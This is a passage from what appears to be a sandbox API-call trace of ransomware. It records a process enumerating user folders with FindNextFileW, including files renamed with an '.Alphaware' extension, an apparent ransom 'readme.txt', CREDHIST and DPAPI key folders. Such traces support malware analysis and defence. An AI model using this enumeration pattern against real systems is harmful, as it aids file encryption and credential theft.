ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0093.861] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b267fb0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8a249140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd20, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml.Alphaware", cAlternateFileName="OUTLOO~1.ALP")) returned 1 [0093.861] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a249140, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a249140, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a249140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0093.861] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a249140, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a249140, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a249140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0093.861] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.863] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.863] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.863] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.863] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.863] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.863] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.864] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.864] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x60624f40, ftLastWriteTime.dwHighDateTime=0x1d85957, nFileSizeHigh=0x0, nFileSizeLow=0x258, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0093.864] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0093.864] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x510a9850, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x510a9850, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-4219442223-4223814209-3835049652-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0093.864] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bba3b70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7bba3b70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x606bd4c0, ftLastWriteTime.dwHighDateTime=0x1d85957, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0093.864] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.864] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.865] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.865] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x60624f40, ftLastWriteTime.dwHighDateTime=0x1d85957, nFileSizeHigh=0x0, nFileSizeLow=0x258, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0093.865] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0093.865] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x510a9850, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x510a9850, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-4219442223-4223814209-3835049652-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0093.865] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bba3b70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7bba3b70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x606bd4c0, ftLastWriteTime.dwHighDateTime=0x1d85957, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0093.865] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bba3b70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7bba3b70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x606bd4c0, ftLastWriteTime.dwHighDateTime=0x1d85957, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0093.865] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.867] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.867] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2b9bd87, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cAlternateFileName="BE5B4F~1")) returned 1 [0093.867] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0093.867] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.869] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.869] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2b9bd87, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cAlternateFileName="BE5B4F~1")) returned 1 [0093.869] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0093.869] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0093.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.870] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x510a9850, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x510a9850, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.870] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x510a7140, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x510a7140, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x510a9850, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="5641bb28-4900-44ac-8968-98cbaf4439cf", cAlternateFileName="5641BB~1")) returned 1 [0093.870] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x30ba0e70, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x30ba0e70, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30ba0e70, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="bbf2fe4c-d1f1-40ab-8fc1-1022146f6c9a", cAlternateFileName="BBF2FE~1")) returned 1 [0093.870] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x30bed130, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x30bed130, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x51101690, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0093.871] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.871] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x510a9850, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x510a9850, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.871] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x510a7140, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x510a7140, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x510a9850, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="5641bb28-4900-44ac-8968-98cbaf4439cf", cAlternateFileName="5641BB~1")) returned 1 [0093.871] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x30ba0e70, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x30ba0e70, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30ba0e70, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="bbf2fe4c-d1f1-40ab-8fc1-1022146f6c9a", cAlternateFileName="BBF2FE~1")) returned 1 [0093.871] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x30bed130, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x30bed130, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x51101690, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0093.871] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x30bed130, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x30bed130, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x51101690, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0093.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.872] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.872] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0093.872] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0093.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.872] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.872] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0093.872] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: 